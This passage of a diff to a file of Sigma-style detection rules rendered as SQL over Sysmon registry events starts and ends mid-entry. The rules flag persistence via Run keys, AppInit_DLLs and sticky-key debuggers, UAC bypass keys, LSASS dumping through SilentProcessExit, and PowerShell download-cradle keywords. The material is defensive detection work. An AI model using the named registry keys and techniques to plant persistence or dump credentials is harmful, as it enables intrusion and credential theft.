'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.010" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218", + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", - "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "status": "experimental", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "falsepositives": [ - "Unlikely" + "attack.persistence", + "attack.t1547.001" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.impact", - "attack.t1490" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "status": "test", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data 